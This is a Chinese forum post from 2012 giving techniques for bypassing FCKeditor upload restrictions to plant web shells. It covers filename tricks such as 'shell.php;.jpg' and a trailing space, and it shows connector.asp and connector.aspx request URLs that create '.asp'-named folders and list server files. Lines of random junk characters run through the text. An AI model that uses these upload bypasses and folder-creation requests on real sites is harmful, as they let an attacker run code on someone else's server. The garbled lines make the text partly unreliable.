很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
: Y: C2 L `( K0 u5 S
( {5 F/ [3 f( q0 P, K3 J提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
$ a2 B6 Q7 G x4 x* m7 o' U) o4 j/ @ } F% R( n
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。5 m9 v0 y8 {( H. E
; o n' F6 l" z突破建立文件夹:
, f) G' S+ @: O1 |4 i/ B+ W9 X( h. A a
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
9 J6 J. Q* E5 I6 @. T0 {4 _9 N1 e7 e- O: ^- c( A
参数:% ?& [. O7 g) l; }/ z+ U7 e
* c- Y3 Z- c! Y+ f当前目录名:CurrentFolder=/qing.asp
, o# @* g, O9 a7 X ^7 f( }/ p$ h9 x: i5 K
新的目录名:NewFolderName=x.asp7 k# O0 Z6 Y2 ^, Y! X' z' n
& q" C' j: F0 s y4 F其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……0 H2 q! t$ S4 l0 n, `
! y+ |* E; V/ \1 a
那么 x.asp 就已经建立生成了,此方法百试百灵!
O5 g( }& p1 c# o1 T
, e/ B. X( {5 m5 `7 l新建文件夹参数 x.asp,基本都能搞定。1 ?) s9 C& a& ?: K- q
/ i" f6 r: B0 i* a" t! W) z
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建/ q( Y: Z$ ~" x( Q ]
/ B+ S$ Y/ N7 w3 x" Waspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp$ z$ ?6 M/ @9 N; h5 L8 k
; z4 R% z B# A3 J* [2 a% i5 W
获取文件列表 n' j+ E" N, X: R- w. A9 J% w
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
+ I g3 \% a- a! v& r6 M( x2 U. b6 {) ?' h) y, G
|
发表于 2012-12-31 09:27:09
收藏
支持
反对